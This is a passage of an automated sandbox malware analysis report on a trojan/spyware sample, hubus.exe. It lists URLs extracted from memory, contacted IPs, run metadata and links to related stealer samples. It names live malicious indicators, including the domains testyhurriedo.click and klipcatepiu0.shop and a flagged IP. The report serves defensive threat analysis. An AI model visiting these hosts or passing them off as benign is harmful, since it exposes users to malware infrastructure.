                                                                                                  https://cart.ebay.com/chrome.exe, 00000002.00000002.12192756587.00002D2402BC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000002.00000002.12194236207.00002D2402E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193056193.00002D2402C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.gamestop.com/cart/chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://aqfer.comchrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://www.boostmobile.com/cart.htmlchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://packetstormsecurity.com/chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.samsclub.com/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.comchrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000002.00000002.12194236207.00002D2402E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://weborama-tech.ruchrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.overstock.com/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.bloomingdales.com/my-bagchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://gemini.google.com/app?q=chrome.exe, 00000002.00000002.12192756587.00002D2402BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://secure.newegg.com/shop/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://secure.eicar.org/eicar.com.txtchrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195250217.00002D2403068000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://gemini.google.com/app?q=searchTermschrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196370294.00002D2403298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.jcrew.com/checkout/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://uk.search.yahoo.com/searchchrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://paa-reporting-advertising.amazonchrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://setup.office.com/signin-oidcchrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exechrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198933834.00002D24036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.officedepot.com/cart/shoppingCart.dochrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://googleads.g.doubleclick.net/chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12187055049.00002D24022F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://ww.googchrome.exe, 00000002.00000002.12187055049.00002D24022F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000002.00000003.12121690986.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12122364326.00002D2402C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12118811954.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.weightwatchers.com/us/shop/checkout/cartchrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/42266842chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://lens.google.com/gen204chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_alldp.icochrome.exe, 00000002.00000003.12122661704.00002D2402790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12189824344.00002D2402794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120697065.00002D2402790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195167249.00002D2403050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12122529790.00002D240278C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191689804.00002D2402A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.google.com:443chrome.exe, 00000002.00000002.12190418549.00002D2402920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.google.com/search?q=atchrome.exe, 00000002.00000002.12188460320.00002D2402524000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/42263580chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://klipcatepiu0.shop/hubus.exe, 00000001.00000002.12270439971.0000000001601000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000002.00000003.12121625572.00002D240270C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119832619.00002D24037B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120319474.00002D2403844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120050820.00002D2402740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119929342.00002D2403818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://www.talbots.com/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slotchrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://testyhurriedo.click/3hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://www.bhphotovideo.com/find/cart.jspchrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exechrome.exe, 00000002.00000002.12200633021.00002D2403A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198816161.00002D2403668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.vitalsource.com/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://issuetracker.google.com/292285899chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://testyhurriedo.click/Dhubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://www.carid.com/cart.phpchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.pokemoncenter.com/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://google.com/cchrome.exe, 00000002.00000002.12186475572.00002D2402279000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://lens.google.com/v3/uploadchrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://recoveringlib.blogspot.com/chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://stackoverflow.com/q/2152978/23354hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://anglebug.com/42265720chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://anglebug.com/42264571chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://lens.google.com/uploadchrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://www.homedepot.com/mycart/homechrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://docs.google.com/document/?usp=installed_webappchrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197687210.00002D24034B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://beastacademy.com/checkout/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1ccchrome.exe, 00000002.00000003.12147909365.00002D24038D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191554369.00002D2402A70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://www.belk.com/shopping-bag/chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://www.neimanmarcus.com/checkout/cart.jspchrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://storygize.netchrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://www.youtube.com/:chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        104.21.112.1
                                                                                                                                                                                                                                        		testyhurriedo.clickUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                        		unknownReserved
                                                                                                                                                                                                                                        		unknownunknownfalse
                                                                                                                                                                                                                                        172.253.124.104
                                                                                                                                                                                                                                        		www.google.comUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse

                                                                                                                                                                                                                                        Private

                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        192.168.11.20
                                                                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                        Analysis ID:1578636
                                                                                                                                                                                                                                        Start date and time:2024-12-20 00:55:58 +01:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 8m 37s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:6
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:hubus.exe
                                                                                                                                                                                                                                        (renamed file extension from dll to exe)
                                                                                                                                                                                                                                        Original Sample Name:hubus.dll
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@17/0@4/5
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 92%
                                                                                                                                                                                                                                        • Number of executed functions: 213
                                                                                                                                                                                                                                        • Number of non-executed functions: 27

                                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.105.94, 172.253.124.138, 172.253.124.100, 172.253.124.101, 172.253.124.102, 172.253.124.139, 172.253.124.113, 108.177.122.84, 74.125.136.101, 74.125.136.139, 74.125.136.100, 74.125.136.138, 74.125.136.113, 74.125.136.102, 142.250.217.174, 172.217.215.139, 172.217.215.102, 172.217.215.100, 172.217.215.101, 172.217.215.113, 172.217.215.138, 108.177.122.139, 108.177.122.113, 108.177.122.101, 108.177.122.102, 108.177.122.138, 108.177.122.100, 142.250.217.238, 64.233.176.113, 64.233.176.102, 64.233.176.138, 64.233.176.139, 64.233.176.101, 64.233.176.100, 172.217.165.206, 23.47.204.53
                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                        18:58:24API Interceptor11x Sleep call for process: hubus.exe modified

                                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                                        • beammp.com/phpmyadmin/
                                                                                                                                                                                                                                        239.255.255.250file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                          1734647107dd7eab79078510a75c9c904ec20f028e4e5eeaf98868f69fdfb304d2c24675ce436.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            17346471071098118b26fa2e7fe54471af2f31e15cc65aad0de660d0190f83c19fa638201a790.dat-decoded.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                              1734647107cb5feb29beac8e7c2a4d2b204afcea8969eb9f4b139cbe2e61d9316e36a22099229.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                                1734647108c2d815e9b224b58a4453e937ebbee326356eaa9618758f1ee8f3e412a78fcc82730.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                                  ghostspider.7zGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6iGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                        https://mdgouv.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          https://kubota.highq.com/kubota/sitecontroller.action?metaData.siteID=7&metaData.parentFolderID=74Get hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            • 104.21.64.80
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 104.21.23.76
                                                                                                                                                                                                                                                            https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                                                                                            https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6iGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 104.18.10.207
                                                                                                                                                                                                                                                            billys.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                                                                                            ruppert.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                                                                                            https://supercrete.lk/m/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 104.17.25.14
                                                                                                                                                                                                                                                            Employee_Letter.PDFuJPefyDW1j.urlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 172.67.134.25
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                            • 104.26.0.231

                                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                                            mirabon.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                                            Svcrhpjadgyclc.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                                            MFQbv2Yuzv.exeGet hashmaliciousLummaC, StealcBrowse
